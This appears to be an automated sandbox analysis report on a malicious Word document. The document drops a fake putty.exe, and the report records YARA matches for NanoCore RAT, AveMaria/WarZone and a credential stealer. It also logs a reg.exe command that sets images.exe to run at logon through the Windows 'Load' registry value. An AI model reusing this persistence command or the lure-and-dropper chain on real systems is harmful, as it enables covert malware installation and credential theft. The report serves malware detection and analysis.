        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 4Screenshot OCR: Enable Editing when opening. 0 Page:l of 2 , Words:19 I 3 I N@m 13 ;a 10096 G) FI G) ,, ' I
        Source: Screenshot number: 12Screenshot OCR: Enable Editing when opening. ii: ^ f,if= a S
        .NET source code contains very large stringsShow sources
        Source: putty[1].exe.0.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: putty.exe.3.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: putty.exe.6.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: images.exe.13.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 13.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 14.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 14.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Found suspicious RTF objectsShow sources
        Source: abdtfhgXgdghgh.ScTStatic RTF information: Object: 0 Offset: 00000961h abdtfhgXgdghgh.ScT
        Microsoft Office creates scripting filesShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScTJump to behavior
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJump to dropped file
        Powershell drops PE fileShow sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,13_2_0040EDA9
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,15_2_0040EDA9
        Source: C:\ProgramData\images.exeFile created: C:\Windows\System32\rfxvmt.dll
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_0010B8B310_2_0010B8B3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_0010BDE010_2_0010BDE0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AF45010_2_002AF450
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5C9810_2_002A5C98
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ACD2810_2_002ACD28
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A893810_2_002A8938
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A717810_2_002A7178
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AD15010_2_002AD150
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A6A3810_2_002A6A38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A0A5010_2_002A0A50
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A7A9010_2_002A7A90
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5C8910_2_002A5C89
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AD92010_2_002AD920
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AC50010_2_002AC500
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A75A810_2_002A75A8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A95B110_2_002A95B1
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA9C010_2_002AA9C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA5C010_2_002AA5C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A95C010_2_002A95C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5A7810_2_002A5A78
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA28810_2_002AA288
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5A8810_2_002A5A88
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5EF810_2_002A5EF8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ABEC410_2_002ABEC4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AAB3010_2_002AAB30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ABF3010_2_002ABF30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ADF6010_2_002ADF60
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA7A010_2_002AA7A0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AD3C810_2_002AD3C8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_005A007010_2_005A0070
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_005A000610_2_005A0006
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_0010A5BD10_2_0010A5BD
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A31F810_2_002A31F8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0040007011_2_00400070
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0040002A11_2_0040002A
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053F45011_2_0053F450
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535C9811_2_00535C98
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D15011_2_0053D150
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053717811_2_00537178
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053893811_2_00538938
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053CD2811_2_0053CD28
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00530A5011_2_00530A50
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00536A3811_2_00536A38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00537A9011_2_00537A90
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535C8911_2_00535C89
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053CD1811_2_0053CD18
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053C50011_2_0053C500
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D92011_2_0053D920
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A9C011_2_0053A9C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A5C011_2_0053A5C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005395C011_2_005395C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005395B111_2_005395B1
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005375A811_2_005375A8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535A7811_2_00535A78
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535EF811_2_00535EF8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535A8811_2_00535A88
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A28811_2_0053A288
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053DF6011_2_0053DF60
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053AB3011_2_0053AB30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053BF3011_2_0053BF30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D3C411_2_0053D3C4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D3C811_2_0053D3C8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A7A011_2_0053A7A0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005331F811_2_005331F8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_0010B8B312_2_0010B8B3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_0010BDE012_2_0010BDE0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_0010A5BD12_2_0010A5BD
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041327913_2_00413279
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041DEAA13_2_0041DEAA
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041327915_2_00413279
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041DEAA15_2_0041DEAA
        Source: C:\ProgramData\images.exeCode function: 17_2_0118B8B317_2_0118B8B3
        Source: C:\ProgramData\images.exeCode function: 17_2_0118BDE017_2_0118BDE0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035F45017_2_0035F450
        Source: C:\ProgramData\images.exeCode function: 17_2_00355C9817_2_00355C98
        Source: C:\ProgramData\images.exeCode function: 17_2_0035893817_2_00358938
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CD2817_2_0035CD28
        Source: C:\ProgramData\images.exeCode function: 17_2_0035717817_2_00357178
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D15017_2_0035D150
        Source: C:\ProgramData\images.exeCode function: 17_2_00356A3817_2_00356A38
        Source: C:\ProgramData\images.exeCode function: 17_2_00357A9017_2_00357A90
        Source: C:\ProgramData\images.exeCode function: 17_2_00355C8917_2_00355C89
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D8FC17_2_0035D8FC
        Source: C:\ProgramData\images.exeCode function: 17_2_0035C4CC17_2_0035C4CC
        Source: C:\ProgramData\images.exeCode function: 17_2_0035B53017_2_0035B530
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D92017_2_0035D920
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CD1817_2_0035CD18
        Source: C:\ProgramData\images.exeCode function: 17_2_0035C50017_2_0035C500
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D14117_2_0035D141
        Source: C:\ProgramData\images.exeCode function: 17_2_003595B117_2_003595B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A5B117_2_0035A5B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A9B117_2_0035A9B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A9C017_2_0035A9C0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A5C017_2_0035A5C0
        Source: C:\ProgramData\images.exeCode function: 17_2_003595C017_2_003595C0
        Source: C:\ProgramData\images.exeCode function: 17_2_00355A7817_2_00355A78
        Source: C:\ProgramData\images.exeCode function: 17_2_0035F24817_2_0035F248
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CA8C17_2_0035CA8C
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A28817_2_0035A288
        Source: C:\ProgramData\images.exeCode function: 17_2_00355A8817_2_00355A88
        Source: C:\ProgramData\images.exeCode function: 17_2_00355EF817_2_00355EF8
        Source: C:\ProgramData\images.exeCode function: 17_2_0035BEC417_2_0035BEC4
        Source: C:\ProgramData\images.exeCode function: 17_2_0035AB3017_2_0035AB30
        Source: C:\ProgramData\images.exeCode function: 17_2_0035BF3017_2_0035BF30
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF6017_2_0035DF60
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF4F17_2_0035DF4F
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A7A017_2_0035A7A0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A79017_2_0035A790
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C417_2_0035D3C4
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C817_2_0035D3C8
        Source: C:\ProgramData\images.exeCode function: 17_2_004A007017_2_004A0070
        Source: C:\ProgramData\images.exeCode function: 17_2_0118A5BD17_2_0118A5BD
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A5017_2_00350A50
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A4017_2_00350A40
        Source: C:\ProgramData\images.exeCode function: 17_2_003531F817_2_003531F8
        Source: C:\ProgramData\images.exeCode function: 17_2_003531E817_2_003531E8
        Source: C:\ProgramData\images.exeCode function: 21_3_042442D021_3_042442D0
        Source: C:\ProgramData\images.exeCode function: 21_3_04281AA021_3_04281AA0
        Source: C:\ProgramData\images.exeCode function: 21_3_04276B5021_3_04276B50
        Source: C:\ProgramData\images.exeCode function: 21_3_042404D021_3_042404D0
        Source: C:\ProgramData\images.exeCode function: 21_3_042A25EC21_3_042A25EC
        Source: C:\ProgramData\images.exeCode function: 21_3_042645D021_3_042645D0
        Source: C:\ProgramData\images.exeCode function: 21_3_0423466021_3_04234660
        Source: C:\ProgramData\images.exeCode function: 21_3_042456B021_3_042456B0
        Source: C:\ProgramData\images.exeCode function: 21_3_0424872021_3_04248720
        Source: C:\ProgramData\images.exeCode function: 21_3_0424973021_3_04249730
        Source: C:\ProgramData\images.exeCode function: 21_3_0424601021_3_04246010
        Source: C:\ProgramData\images.exeCode function: 21_3_0427E17021_3_0427E170
        Source: C:\ProgramData\images.exeCode function: 21_3_042511E021_3_042511E0
        Source: C:\ProgramData\images.exeCode function: 21_3_0429E32F21_3_0429E32F
        Source: C:\ProgramData\images.exeCode function: 21_3_0424235021_3_04242350
        Source: C:\Windows\System32\drvinst.exeProcess token adjusted: Load Driver
        Source: C:\ProgramData\images.exeCode function: String function: 042358A0 appears 70 times
        Source: C:\ProgramData\images.exeCode function: String function: 042362B0 appears 93 times
        Source: C:\ProgramData\images.exeCode function: String function: 04235680 appears 38 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 004036F7 appears 144 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 0040357C appears 62 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00411E88 appears 98 times
        Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpdr.sys
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
